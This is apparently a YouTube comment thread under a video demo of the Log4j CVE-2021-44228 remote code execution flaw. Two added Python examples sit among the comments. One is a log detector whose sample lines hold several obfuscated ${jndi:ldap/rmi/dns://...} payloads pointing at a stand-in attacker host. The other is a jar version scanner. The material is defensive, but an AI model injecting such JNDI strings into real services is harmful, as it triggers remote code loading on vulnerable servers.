Walking through how the log4j CVE-2021-44228 remote code execution vulnerability works and how it's exploited.
Comments: 257
@mint530 2 years ago
You saying "just came out a few days ago" makes it sound like a fun new game just got released haha
@MalwareTechBlog
2 years ago
Yeah lol, I just realized that 😂
@techutility
2 years ago
🤣🤣🤣🤣🤣
@-bubby9633
2 years ago
Tbf for us security professionals this is basically like a new game was just released 😂
@dipankarmitra3334
2 years ago
@@-bubby9633 🤣🤣🤣
@OmprakashYadavIIT
2 years ago
😂😂
@_JohnHammond 2 years ago
Great demonstration, Marcus!
@anuzravat
2 years ago
U got 1 subscriber
@seppy624
2 years ago
hey john
@Clytax
4 months ago
@@anuzravat More like 1.2 million
@devinmagee1948 2 years ago
It's my first week working in a cyber security environment professionally. Trying to get a grasp on my organization's infrastructure while trying to help with the log4j vuln has been a real trial by fire lol. Always enjoy your content!
@complexedone
2 years ago
I understand. I just joined a new org as part of the infrastructure team. I still don't know all our systems, but I'm learning fast as I help to find and patch systems as needed/available.
@jasrid04
2 years ago
Welcome to the industry and good luck!
@devinmagee1948
2 years ago
@@complexedone Good luck. We will get there eventually!
@manfrombritain6816
2 years ago
what have you been doing to help? what's your role? i'm looking to start in security soon!
@jdemuro1
2 years ago
Best way to learn quickly though. This is a blessing in disguise for you!
@ltsmash9544 2 years ago
I love how you actually demonstrate the vulnerability and not just talk about it, like what most others are doing. Keep it up mate, you've got my Subscribe!
@zedzpan
2 years ago
Yup, learnt more from this than the over-engineered blogs I've been tracking!
@slaloulin8289
2 years ago
not to mention how he only did it in ~3 mins, saves a lot of time for such a great explanation
@brianrdetweiler 2 years ago
Clicking various links for 30 minutes, trying to understand the issue, and you explain it in less than 4. Thank you!
@AlphaZeroOmega 2 years ago
Thanks Marcus. I appreciate your ability to explain a vulnerability like this and demo it in a really understandable way.
@badashgr8 2 years ago
With videos out there in 20+ mins and you here with less than 4 mins explaining it so clearly, I know which video to click from next time.
@romanxyz7248 2 years ago
I had problems understanding this for days and you explained it in under 4 mins. You're amazing Marcus 👏❤️
@masettyvivek8155 2 years ago
This is one of the greatest demonstrations I have listened to on KZread. You are amazing!!
@andresromerodev 2 years ago
This explanation is so cool! I’ve been hearing about the vulnerability but nobody took the time to explain it this way. Thank you! :)
@Swing17 2 years ago
Very well explained. Good video Marcus!
@abhilpnYT 2 years ago
One of the best explanations with a practical demo. Thank you ..
@lofman 2 years ago
"versatile" is the key word for this vulnerability. thanks for explaining! :)
@DavisTibbz 2 years ago
First time understanding what this means. Thanks.
@Svalbaz 2 years ago
I work in IT and the last week or two has been absolutely mental thanks to this
@kosmonautofficial296 2 years ago
Always cool to see a Marcus video out on a new vuln!
@BSwitchGTG 2 years ago
Just started a new job, and moved my support area from networking to applications. Day 1 of the new gig and I was hearing it was an all-hands to deal with the "new vulnerability". Thankfully new enough that there was no headache for me to deal with, but oof, glad to see what they were up against!
@Burgundy_towel 2 years ago
Thanks for such a layman explanation, I was able to grasp it..
@calmeidazim 2 years ago
Thank you Marcus, simple but quite clear to understand
@FloresMenyapa a year ago
Greetings from Indonesia, I really admire you, and you are great. I'm just a beginner who wants to learn like you from the bottom
@sniGGandBaShoR 2 years ago
the variable thing in a string is called string interpolation my dude!
@AM-og2oi 2 years ago
thank you for this video marcus!!! a lot of news on this and this has helped me get a better understanding of how the vulnerability functions
@YourWaifu0 2 years ago
Nice explanation, I believe showing how easy it is to do is the scary part more than anything since a lot of applications use log4j.
@zaitarh 2 years ago
The ${…} syntax is not part of Java - it’s solely a Log4j syntax. (If it were part of Java there would have been no problem, as it would have been evaluated at compile time, not run time)
@marcellkovacs5452
2 years ago
@@kpaxxapk6397 the logger should sanitise the input the same way an ORM sanitises model instance lookups to avoid SQL injection.
@zaitarh
2 years ago
@@kpaxxapk6397 In theory, it's a fair point - it certainly would be possible to sanitize it. But 1) the documentation did not state this anywhere afaik and 2) no one is interested in having a logging framework where you have to sanitize everything. People just want to do "log.error("My error: {}", error)" and be done with it. I've used Log4j before some years ago, and never knew about that "Lookup" feature - and apparently I was not the only one. :) Imho, it was a very annoying feature, security flaw or not, as I don't want the text I log to sometimes be transformed into something else, just because it happens to contain "${" and "}"... And this undesirable feature was enabled by default...
@zaitarh
2 years ago
@@kpaxxapk6397 Note: It would kind of be possible for Log4j to sanitize it itself... If they forced you to use it in a specific way... You CAN (but don't have to) use the logger as having a format string as first param, and then data-values for the rest of the params (similar to printf, etc)..: log.info("This is the format string. Data is {} and {}", data1, data2);
@fox2code
2 years ago
@@zaitarh This RCE was a feature, not a bug, I saw the code, it was done intentionally, I'm sure someone added this feature on purpose to use it for what the video showed us.
@reemontel8036
2 years ago
No idea why I always assume the ${...} syntax is SpEL from the Spring spell syntax but I'm not 100% sure if that's correct or not
@53kt0r 2 years ago
Great video! plain, simple and without bias.
@DalBileAbas 5 months ago
Thanks for simplifying the vulnerability
@GGdevelopment 2 years ago
Great job at presenting the vulnerability!
@das_evoli 2 years ago
Finally no bullshitting around. Straight to the point and understandable for every novice programmer
@mdzen22e a year ago
just what I am looking for....thx dude
@strato_5459 2 years ago
good explanation. told exactly what it is and how it works. yeah i know what im looking at already but for anyone else that has no idea, this is the video they should watch
@tapion1998 2 years ago
I can't believe that it is that simple. The first thing you learn is always to control the input that is given. That is why you won't just take the given SQL command and execute it. To think that log4j didn't sanitise their input is just CRAZY. That's a one-liner, my god...
@yodamaxwell 2 years ago
Fantastic demonstration!
@DaraulHarris 2 years ago
Subbed. That was an excellent explanation.
@metrixc 2 years ago
Hi Marc, great video. If I see it right, the outbound connections to e.g. an LDAP server are always unencrypted since JNDI does regular (unencrypted) lookups. That means that companies could look for unexpected outbound LDAP requests to servers on the internet, right? Just curious. Would there be a way to make these outbound requests encrypted? Thank you!
@razzeeee 2 years ago
Best summary yet
@imkir4n 2 years ago
clean explanation marcus!
@willemachternaam690 2 years ago
'Drop bobby tables' for Java. Nice! Thank you for this.
@pjj1947 2 years ago
Thanks Marcus! Sweet and clean explanation!
@edgay 2 years ago
This 4 minute video was more clear and valuable than the 30-minute one I just watched on this RCE
@edgay
2 years ago
cough johnhammond cough
@kotiwa 2 years ago
You made this very easy to understand. thanks!
@manideepkumar959 2 years ago
Better than Java Brains' log4j explanation, now I understand
@florian538 2 years ago
Could you solve this issue by looking for and commenting out the feature in the log4j library?
@valentinpopescu6704 2 years ago
How can you set up the LDAP server on localhost and which port to choose?
@anonymous6666 2 years ago
great explanation and demo
@cool-aquarian 2 years ago
when I try to do the same thing in my Eclipse using log4j it is simply printing the log message.. Any clue why?
@jasonOfTheHills 2 years ago
Great explanation. And wow.
@ndenkha 2 years ago
Great video. Question, so is the problem that even though log4j stores that command string in a log file it gets executed while being written to the file?
@thelineidk 2 years ago
And if I go to 2b2t from my phone, for example, will the exploit work on me? (I play Java Minecraft on my phone)
@TheGameIsOverCy 2 years ago
Nice explanation ! Thank you :)
@TreeFrogOnATree 2 years ago
well, well that's really interesting thanks for uploading!
@TheBenJiles 2 years ago
Simple. To the point. Thanks man
@Robert-pt2jz 5 months ago
Hello, I am just curious. I have a statement and would like to know if my logic is correct. The vulnerability is caused due to no input checking in the program, allowing unintentional interaction with the user? Is this a correct way to view this or am I way off base?
@chess598 2 years ago
Concise and to the point, thanks!
@01071985hh 2 years ago
impactful explanation thanks
@xl8373 2 years ago
Great demonstration , thank you !
@majorassault5074 2 years ago
I have to ask, what happens if you are running a VPN? Will the VPN's server get infected with whatever malware/ransomware/trojan/ddos/worm a black hat sends their way?
@hellboykuro 2 years ago
hi can anyone help me when i try to inject any executor in any game it says "This exploit is down while critical ace/rce vuln is fixed" this is on roblox btw
@andreasMou123 2 years ago
nice demo, thanks!
@tinkleondabeach 2 years ago
Thx daddy great explanation
@Glitchflim 2 years ago
How to fix the issue? Are there any steps?
@freddyfozzyfilms2688 a year ago
Can u also input a lambda?
@BirgerBurgerBargir 2 years ago
Great video
@ewerybody 2 years ago
Wasn't the base64 an extra indirection? The class you're loading can't pop calc.exe directly? 🙄
@freekdeman 2 years ago
Thanks, really helpful.
@wcsoutdoors1393 2 years ago
I love your videos
@victorburnett6329 2 years ago
Wow, that is a pretty glaring vulnerability. Amazing it's only just been discovered.
@BruceDuncan 2 years ago
I still don't get it. What is it that is being returned over LDAP? Is it the base64-encoded string "calc.exe"? Is it a Java object which is doing Runtime.getRuntime().exec("calc.exe")? It's been nearly a week and I still don't get it!
@EnglishRain 2 years ago
Thank you for this!
@danielblanchette8593 2 years ago
So you're telling me that the Log4j vulnerability is roughly the same as there was with Linux a while ago where if you put something like [{:}};} (don't remember the exact spelling) you can then enter a command that can be executed from an app, or the other thing that happened to Twitter where you could send a tweet that would retweet itself in your browser... Why is it always the same vulnerability that is found?
@chickendumpling9595 2 years ago
I know I’m late to the party but I would greatly appreciate it if someone could clarify some things for me: 1) that error at the end, I can't quite catch it but I figure it must be due to the fact that the downloaded object cannot be concatenated without a toString method or something like that? 2) Isn't that base64 ‘calculator.exe’ just a directory on your server, not part of the actual object? 3) what is that on line 8? Is setting that property necessary for this exploit to work? Again, I appreciate highly any response :)
@bagzhansadvakassov1093 2 years ago
I wonder how many 0-day exploits are out there in open software.
@patrickmcevoy1776 2 years ago
Isn't 1.8 not vulnerable to the exploit though?
@susulemons 2 years ago
how does an attacker make the call in the first place though? (have access to call the function with the string)
@MalwareTechBlog
2 years ago
By controlling some input that gets logged by the application
@sergedeugoue2569 2 years ago
Maybe I'm overlooking things but it seems so obvious. How did this vulnerability take years to discover?
@luisdawa 2 years ago
Isn't it somewhat similar to SQL Injection?
@paulkelly5618 2 years ago
Awesome video! Quick question: What is the symbol you have on line 11 of your code just after "logger.error(" but before "Hello..."
@corv882002
2 years ago
It says "s:" and is inserted by the IDE to let you know what the parameter's called
@philipjfry4465
2 years ago
parameter hinting
@WhiteSiroi 7 months ago
thank you, very helpful
@peter11256 2 years ago
Great explanation. I just didn't quite understand one thing. Is it necessary for the object you are loading to exist in the LDAP server?
@isomeme
2 years ago
Yes, but as the attacker can point the lookup to an LDAP server they control, that's easy to arrange.
@MH-oc4de 2 years ago
To be clear, it's the log4j logger that is doing the ${variable} expansion, and not the shell (?) e.g., if you print out username within the code it is not a problem, but log4j is (somehow) executing it? Thanks!
@MalwareTechBlog
2 years ago
Correct
@rommeljoven1046 2 years ago
Thanks for the demo. May I know what will be the parent process of "calc.exe"? Would it be "java.exe"?
@MalwareTechBlog
2 years ago
Yup, it'll be the Java VM
@krizanand 2 years ago
Pretty much every security team in an organization is stuck in log4j meetings 😜 Wonderful explanation though of the exploit.
@kingKabali 2 years ago
Right to the point. Thanks man.
@logicfirst7959 2 years ago
You are the man Marcus, one thing though, how can I emulate this in my environment? I tried your commands and am getting "Error: Could not find or load main class Main".
2 years ago
thanks for the explanation, going to make a documentary on this!
@tansanwastaken
2 years ago
Purchased botted sub account, ratio
@mandokir
2 years ago
Great, a whole documentary nobody asked for.
@traxooza 2 years ago
Coming from a C++ background, I can't see why the code in "username" gets evaluated. Is it because log4j triggers this evaluation somehow? Why would it do that?
@scarletdice
2 years ago
correct, log4j evaluates the variable that is wrapped in ${...} (its own syntax for string interpolation). That, combined with some remote JNDI lookup mechanism within the library itself, a feature that they claimed was needed for backward compatibility purposes (??). Note that JNDI is a standard in Java that allows remote object load/lookup (!!).
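Added example, not code from the video or from any commenter: a small Python normalizer that applies the same nested ${...} substitution rules Log4j's lookup interpolator uses, for the handful of lookups that obfuscated payloads lean on (lower, upper, the :-default fallback, and an unresolvable prefix such as env falling through to its default), then matches the canonical ${jndi:scheme://...} form. It illustrates two things discussed in the comments: that it is Log4j, not the shell, that expands ${...} and resolves innermost lookups first, and that hunting for these requests in logs needs a "canonicalize, then match" step, because a plain grep for ${jndi: misses ${${lower:j}ndi:...}. The sample access-log lines and the 198.51.100.7 target are constructed for the example, and the resolver covers only the lookups needed here, not Log4j's full set.

```python
import re

# One innermost ${...}: a body with no further "$", "{" or "}" inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# The canonical form every obfuscated variant is reduced to before matching.
JNDI = re.compile(r"\$\{jndi:([A-Za-z]+)://([^}]*)\}")


def _resolve(body):
    """Evaluate one lookup body the way Log4j's StrSubstitutor does, for the
    subset of lookups used in obfuscated payloads. Returns None when the
    lookup cannot be resolved; Log4j then leaves the text as written."""
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "jndi":
        # Freeze the jndi lookup behind private markers so it is not re-evaluated.
        return "\x00" + rest + "\x01"
    default = None
    if ":-" in body:                       # ${name:-default} fallback syntax
        body, default = body.split(":-", 1)
        prefix, _, rest = body.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return rest.lower()
    if prefix == "upper":
        return rest.upper()
    # env, sys, date, ... are deliberately not consulted here; payloads only
    # ever use them for their default branch, e.g. ${env:NaN:-j}.
    return default


def _substitute(match):
    resolved = _resolve(match.group(1))
    if resolved is None:
        # Unresolvable: freeze it literally so the loop terminates.
        return "\x02" + match.group(1) + "\x03"
    return resolved


def canonicalize(text, max_rounds=64):
    """Resolve innermost lookups until nothing changes, then restore the
    frozen tokens. Nested payloads collapse to ${jndi:...}."""
    for _ in range(max_rounds):
        new = INNERMOST.sub(_substitute, text)
        if new == text:
            break
        text = new
    return (text.replace("\x00", "${jndi:").replace("\x01", "}")
                .replace("\x02", "${").replace("\x03", "}"))


def find_jndi(line):
    """Return (scheme, target) for every JNDI lookup hidden in the line."""
    return [(m.group(1).lower(), m.group(2)) for m in JNDI.finditer(canonicalize(line))]


def scan(lines):
    """Return (line_index, scheme, target) for every hit across the input."""
    hits = []
    for i, line in enumerate(lines):
        for scheme, target in find_jndi(line):
            hits.append((i, scheme, target))
    return hits


# Constructed sample access-log lines (not real traffic); 198.51.100.7 is a
# documentation address standing in for an attacker-controlled host.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.5 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:20 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.7/x}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:21 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/y}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:22 +0000] "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi:${upper:d}ns://198.51.100.7/z}"',
    'Order ${orderId} placed for user alice',   # ordinary template text, not a JNDI lookup
]

if __name__ == "__main__":
    for index, scheme, target in scan(SAMPLE_LOG):
        print(f"line {index}: jndi {scheme} -> {target}")
```

The benign `${orderId}` line survives untouched because an unknown prefix with no default is left as written, which is also what Log4j does, so template text in application logs does not produce false positives. Any further lookups an attacker uses for padding follow the same resolve-innermost-first rule and can be added to `_resolve` one line at a time.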
@tuananhtass3693 2 years ago
tks, Marcus!
@patco258 2 years ago
Great great great video
@thexlr8rkid 2 years ago
This video is perfect
@lIlIllll1 2 years ago
what terminal thing are you using where you can see both the application code and terminal? (Im a noob dont yell LOL)
@nickpechie6951
2 years ago
that's the built-in terminal in IntelliJ
@jackofnotrades15 2 years ago
It's not a part of Java as somebody mentioned before. The syntax is kind of string interpolation though.
@melkileo 2 years ago
It's quite a good video but I think you should have talked about the JNDI/LDAP breach that enables RCE. JNDI/LDAP basically doesn't allow injecting malicious code, but a breach from 2017 makes it possible to inject and initialize a custom Java class the LDAP server redirects to
@losthedgehog3922 2 years ago
Great. Now show the LDAP server configuration and how exactly it serves the Java object payload. None of the videos seem to explain how that works. They either evade it or use the marshalsec LDAP server, also never explaining how it works.
@sonalita_ 2 years ago
I'm still confused about how the jndi payload gets executed (i.e. calc.exe) in this case - isn't the jndi lookup just returning data? what is it that makes it actually execute calc.exe??? nobody seems to be able to explain this.
@arvidmildner6274
2 years ago
As I've understood it, it's basically a "hook" and the intended functionality of log4j which says: take this url, load the object/function there and run it. So the reason it is run is because that's how it was supposed to be. It's not the malicious code itself that says that it should be run. But I may be wrong here.
@53kt0r
2 years ago
To answer your question: yes. everything in here is data (even this video itself), eg: Y2FsYy5leGU= is calc.exe in base64, that is the resource that is loaded thru JNDI and passed to the log4j logger as a variable to be logged. I think that is clear enough, hopefully for you too. Cheers!
@Pcatalin66 2 years ago
${variable} is an EL expression for server scripting. Looks similar to string interpolation from C#: $"{yourVarHere}"
@djvex6180 2 years ago
Thank you so much.
@redwaller1 2 years ago
Words cannot describe- how did this slip unnoticed? I cannot imagine writing code that would result in behavior like this, and yet it must surely be a trap even experienced developers might fall into.
@maxwellmapako3820
2 years ago
I honestly believe that you cannot cater for what you don't expect 🤣
@jayit6851
2 years ago
@@maxwellmapako3820 This is like a classic example of unsanitized input. Idk how any experienced developer like those working with the Apache Foundation couldn't expect that.
@user-do6gr5ww5e
2 years ago
I was just thinking - this seems adjacent to our classic case of SQL injection. Crazy
@EdwardInTX a year ago
thank you!
@CBMaster2 2 years ago
How has this just come out? Seems like a pretty straightforward exploit? Was it a new feature of log4j or something that has existed for a long time?
@jeremyFaden
2 years ago
Since 2013
@prasantabanerjee1184 2 years ago
Upgrading to the 2.15/2.16 version of Log4j resolves this.
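Added example for the "how to fix it" and "which version" questions above; this is my own code, not from the video, the commenters or the Log4j project. It is a Python inventory check: it walks a jar and every jar/war/ear nested inside it (fat jars keep log4j-core under BOOT-INF/lib), reads the log4j-core version from its Maven pom.properties, records whether JndiLookup.class is still present (deleting that class from the jar was the project's documented workaround for 2.10 and later), and maps the version to the fixed releases: 2.15.0 for CVE-2021-44228, 2.16.0 because the 2.15.0 fix was incomplete (CVE-2021-45046), and 2.17.0 for the lookup-recursion denial of service that followed (CVE-2021-45105), with the 2.12.x and 2.3.x backports for older JVMs. The sample fat jar is built in memory for the example; its JndiLookup.class entry is a placeholder, not real bytecode.

```python
import io
import re
import sys
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED = (".jar", ".war", ".ear", ".zip")

# First fixed release on the main line, on the 2.12.x (Java 7) branch and on
# the 2.3.x (Java 6) branch, per the Log4j security advisories.
FIXES = {
    "CVE-2021-44228": ((2, 15, 0), (2, 12, 2), (2, 3, 1)),  # JNDI lookup RCE
    "CVE-2021-45046": ((2, 16, 0), (2, 12, 2), (2, 3, 1)),  # 2.15.0 fix incomplete
    "CVE-2021-45105": ((2, 17, 0), (2, 12, 3), (2, 3, 2)),  # lookup recursion DoS
}


def parse_version(version):
    """'2.14.1' -> (2, 14, 1); pre-releases like '2.0-beta9' compare as (2, 0, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unparseable log4j version: {version!r}")
    return tuple(int(part or 0) for part in m.groups())


def is_fixed(v, fixes):
    main, branch_212, branch_23 = fixes
    if (2, 12, 0) <= v < (2, 13, 0):
        return v >= branch_212
    if (2, 3, 0) <= v < (2, 4, 0):
        return v >= branch_23
    return v >= main


def assess(version, has_jndi_lookup):
    """Map a log4j-core version plus JndiLookup presence to open findings."""
    v = parse_version(version)
    findings = []
    for cve, fixes in FIXES.items():
        if is_fixed(v, fixes):
            continue
        if cve in ("CVE-2021-44228", "CVE-2021-45046") and not has_jndi_lookup:
            findings.append(f"{cve}: mitigated by removed JndiLookup.class, still upgrade")
        else:
            findings.append(f"{cve}: vulnerable")
    return findings


def inspect_archive(fileobj, name="<archive>"):
    """Yield (path, version, has_jndi_lookup) for each log4j-core found,
    recursing into nested archives such as BOOT-INF/lib/*.jar."""
    try:
        zf = zipfile.ZipFile(fileobj)
    except zipfile.BadZipFile:
        return
    with zf:
        entries = zf.namelist()
        present = set(entries)
        version = None
        if POM_PROPS in present:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        if version is not None or JNDI_LOOKUP in present:
            yield name, version, JNDI_LOOKUP in present
        for entry in entries:
            if entry.lower().endswith(NESTED):
                yield from inspect_archive(io.BytesIO(zf.read(entry)), f"{name}!{entry}")


def report(fileobj, name):
    """Return [(path, version, findings)] for every log4j-core in the archive."""
    out = []
    for path, version, has_jndi in inspect_archive(fileobj, name):
        findings = assess(version, has_jndi) if version else ["version unknown, JndiLookup.class present"]
        out.append((path, version, findings))
    return out


def build_sample_fat_jar():
    """Constructed sample: a Spring-Boot-style fat jar nesting a log4j-core
    2.14.1 jar. Not a real artifact; the class entry is a placeholder."""
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=2.14.1\n")
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe placeholder, not bytecode")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("BOOT-INF/classes/application.properties", "server.port=8080\n")
        zf.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", core.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    targets = [(open(p, "rb"), p) for p in sys.argv[1:]] or [(io.BytesIO(build_sample_fat_jar()), "sample-app.jar")]
    for fileobj, name in targets:
        for path, version, findings in report(fileobj, name):
            print(f"{path}: log4j-core {version or '?'}")
            for f in findings or ["no open findings for these CVEs"]:
                print(f"  {f}")
```

Run it with one or more jar/war paths as arguments, or with none to see the constructed sample flagged. The check keys on the version and on the class rather than on the `log4j2.formatMsgNoLookups` property because that property only applied to 2.10 through 2.14.1 and was declared insufficient once CVE-2021-45046 showed that 2.15.0's fix was incomplete; a scanner that also reads that property would report a false sense of safety.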
@Naglfar83 2 years ago
Nice demonstration, but the code is unreadable on a medium-sized smartphone like mine. Please consider zooming or increasing the font size before uploading.